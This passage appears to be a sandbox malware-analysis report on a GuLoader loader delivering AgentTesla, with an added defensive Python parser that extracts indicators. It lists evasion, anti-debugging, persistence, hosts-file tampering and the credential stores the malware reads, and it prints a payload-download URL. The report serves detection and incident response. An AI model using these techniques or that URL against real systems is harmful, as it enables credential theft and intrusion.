Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Roaming\DnDcR Jump to behavior
Source: classification engine Classification label: mal100.rans.spre.troj.adwa.spyw.evad.winEXE@8/6@3/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior (2 identical entries)
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3088:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3088:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1544:304:WilStaging_02
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Binary string: RegAsm.pdb source: DnDcR.exe, DnDcR.exe.9.dr
Source: Binary string: RegAsm.pdb4 source: DnDcR.exe, 0000000E.00000002.48160223360.0000000000142000.00000002.00020000.sdmp, DnDcR.exe, 00000010.00000002.48240148335.00000000000D2000.00000002.00020000.sdmp, DnDcR.exe.9.dr
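Added example, not part of the Joe Sandbox report: a small parser for the "Source: <who> <Verb>: <what>" evidence lines above, which rebuilds the process tree (unknown -> Statement of Account.exe -> RegAsm.exe -> conhost.exe) and pulls out the indicators a responder pivots on: the dropped PE and its SHA-256, the Run-key autorun, the hosts-file write, the Zone.Identifier removal, the WMI classes queried and the credential stores touched. The verb list and the sample lines are taken from this report's own entries; the report format itself is assumed to be the plain-text rendering shown here.

```python
"""Turn Joe Sandbox 'Source: <who> <Verb>: <what>' evidence lines into structured indicators.

Added example, not Joe Sandbox code. It assumes the plain-text rendering of
the report shown here; SAMPLE_LINES is constructed from the report's own entries.
"""
import re
from collections import defaultdict

SAMPLE_LINES = r"""
Source: unknown Process created: C:\Users\user\Desktop\Statement of Account.exe 'C:\Users\user\Desktop\Statement of Account.exe'
Source: C:\Users\user\Desktop\Statement of Account.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Statement of Account.exe' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Jump to dropped file
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DnDcR Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to harvest and steal ftp login credentials
"""

# The source field may itself contain spaces ("Statement of Account.exe"), so a
# fixed list of verb phrases is what makes the source/object split unambiguous.
VERBS = [
    "Process created", "File created", "File written", "File opened", "File read",
    "Registry value created or modified", "Key opened", "Key value queried",
    "WMI Queries", "Dropped File", "Section loaded", "Mutant created", "Memory written",
]
LINE_RE = re.compile(
    r"^Source: (?P<source>.+?) (?P<verb>" + "|".join(map(re.escape, VERBS)) + r"): "
    r"(?P<object>.+?)(?: Jump to (?:behavior|dropped file))?$"
)
# "<image> '<command line>'" or, for conhost, "<image> <command line>" without quotes.
PROC_RE = re.compile(r"^(?P<image>.+?\.exe) '?(?P<cmdline>.+?)'?$", re.IGNORECASE)
SHA256_RE = re.compile(r"\b[0-9A-Fa-f]{64}\b")
RUN_KEY = r"\microsoft\windows\currentversion\run"
# Credential stores named in the report's "Stealing of Sensitive Information" section.
CRED_STORES = ("winscp", "filezilla", "smartftp", "thunderbird", "outlook", "incredimail")


def parse_line(line):
    """Return {'source', 'verb', 'object'} for an evidence line, None for headings etc."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def parse_report(text):
    return [ev for ev in map(parse_line, text.splitlines()) if ev]


def process_tree(events):
    """Map each parent image to the (image, command line) pairs it spawned."""
    tree = defaultdict(list)
    for ev in events:
        if ev["verb"] == "Process created":
            m = PROC_RE.match(ev["object"])
            if m:
                tree[ev["source"]].append((m["image"], m["cmdline"]))
    return dict(tree)


def extract_indicators(events):
    """Host IOCs: dropped PE + hash, autoruns, hosts tampering, MotW removal, WMI recon, credential stores."""
    ioc = {"dropped": {}, "run_keys": [], "hosts_file": False,
           "zone_id_removed": [], "wmi": [], "cred_stores": []}
    for ev in events:
        verb, obj, low = ev["verb"], ev["object"], ev["object"].lower()
        if verb == "Dropped File":
            h = SHA256_RE.search(obj)
            path = obj[: h.start()].strip() if h else obj
            ioc["dropped"][path] = h.group(0).lower() if h else ioc["dropped"].get(path)
        elif verb == "File created" and low.endswith(".exe"):
            ioc["dropped"].setdefault(obj, None)        # hash may come on a later line
        elif verb == "Registry value created or modified" and RUN_KEY in low:
            ioc["run_keys"].append(obj)                 # also catches RunOnce, by design
        elif verb == "File written" and low.endswith(r"\drivers\etc\hosts"):
            ioc["hosts_file"] = True
        elif verb == "File opened" and ":zone.identifier" in low and "delete" in low:
            ioc["zone_id_removed"].append(obj.split(":Zone.Identifier")[0])
        elif verb == "WMI Queries":
            cls = obj.split()[-1]                       # class name ends both query forms
            if cls not in ioc["wmi"]:
                ioc["wmi"].append(cls)
        elif verb in ("Key opened", "File opened", "File read") and any(s in low for s in CRED_STORES):
            ioc["cred_stores"].append(obj)
    return ioc


if __name__ == "__main__":
    evs = parse_report(SAMPLE_LINES)
    for parent, children in process_tree(evs).items():
        for image, cmdline in children:
            print(f"{parent}\n  -> {image}  [{cmdline}]")
    print(extract_indicators(evs))
```

The image/command-line pair the tree keeps for RegAsm.exe is the detail worth noticing: the .NET utility was started with the loader's own command line, which is what a hollowed host process looks like in telemetry.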

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.47854626661.0000000002260000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_00404E6E push esp; retf 1_2_00404E8E
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_00407C85 push C8F569B9h; ret 1_2_00407C8A
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_00403E8E push esi; retf 1_2_00403E95
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_0226020A push 02417304h; ret 1_2_0226020F
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_02260E76 push edx; iretd 1_2_02260E77
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_02262076 push ebp; retf 1_2_02262077
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_0133261F push edi; retn 0000h 9_2_01332621
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Code function: 14_2_00144289 push es; retf 14_2_00144294
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Code function: 14_2_001444A3 push es; retf 14_2_001444A4
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Code function: 14_2_00144469 push cs; retf 14_2_0014449E
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Code function: 16_2_000D4289 push es; retf 16_2_000D4294
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Code function: 16_2_000D4469 push cs; retf 16_2_000D449E
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Code function: 16_2_000D44A3 push es; retf 16_2_000D44A4
Source: initial sample Static PE information: section name: .text entropy: 6.81553512761

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DnDcR Jump to behavior (2 identical entries)

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\Desktop\Statement of Account.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (10 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (66 identical entries)
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior (22 identical entries)

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\Statement of Account.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\Statement of Account.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Statement of Account.exe, 00000001.00000002.47853987549.00000000005F4000.00000004.00000020.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEY
Source: Statement of Account.exe, 00000001.00000002.47854827996.0000000002A50000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
Source: Statement of Account.exe, 00000001.00000002.47854827996.0000000002A50000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52055392488.0000000001500000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: RegAsm.exe, 00000009.00000002.52055392488.0000000001500000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1KLPTPDRT8A5OLFK0QZPESH4W5UTNFBMH
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1536 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe TID: 5204 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe TID: 3624 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (3 identical entries)
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Thread delayed: delay time: 922337203685477 Jump to behavior (2 identical entries)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Window / User API: threadDelayed 9924 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Thread delayed: delay time: 922337203685477 Jump to behavior (2 identical entries)
Source: C:\Users\user\Desktop\Statement of Account.exe System information queried: ModuleInformation Jump to behavior
Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: RegAsm.exe, 00000009.00000002.52055783599.00000000015E8000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW$e
Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: RegAsm.exe, 00000009.00000002.52055392488.0000000001500000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1Klptpdrt8A5OlfK0qzPEsH4W5UtnfbMh
Source: RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Statement of Account.exe, 00000001.00000002.47854827996.0000000002A50000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: RegAsm.exe, 00000009.00000002.52056281072.000000000164E000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: Statement of Account.exe, 00000001.00000002.47854827996.0000000002A50000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52055392488.0000000001500000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Statement of Account.exe, 00000001.00000002.47856062180.00000000047D9000.00000004.00000001.sdmp, RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Statement of Account.exe, 00000001.00000002.47853987549.00000000005F4000.00000004.00000020.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeY
Source: RegAsm.exe, 00000009.00000002.52058245869.0000000002FB9000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\Statement of Account.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread information set: HideFromDebugger Jump to behavior
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_00403248 mov ebx, dword ptr fs:[00000030h] 1_2_00403248
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_0040225E mov ebx, dword ptr fs:[00000030h] 1_2_0040225E
Source: C:\Users\user\Desktop\Statement of Account.exe Code function: 1_2_004031BE mov ebx, dword ptr fs:[00000030h] 1_2_004031BE
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Statement of Account.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 9_2_012876A6 KiUserExceptionDispatcher,LdrInitializeThunk, 9_2_012876A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions
Source: C:\Users\user\Desktop\Statement of Account.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1360000 Jump to behavior
Modifies the hosts file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Statement of Account.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Statement of Account.exe' Jump to behavior
Source: RegAsm.exe, 00000009.00000002.52057791523.0000000001B60000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000009.00000002.52057791523.0000000001B60000.00000002.00020000.sdmp Binary or memory string: Progman
Source: RegAsm.exe, 00000009.00000002.52057791523.0000000001B60000.00000002.00020000.sdmp Binary or memory string: :Program Managerev
Source: RegAsm.exe, 00000009.00000002.52057791523.0000000001B60000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior (3 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe Queries volume information: C:\Users\user\AppData\Roaming\DnDcR\DnDcR.exe VolumeInformation Jump to behavior (2 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Modifies the hosts file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File written: C:\Windows\System32\drivers\etc\hosts

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match File source: 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3428, type: MEMORYSTR
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Tries to steal Mail credentials (via file access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Yara detected Credential Stealer
Source: Yara match File source: 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3428, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match File source: 00000009.00000002.52066446246.000000001E3C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 3428, type: MEMORYSTR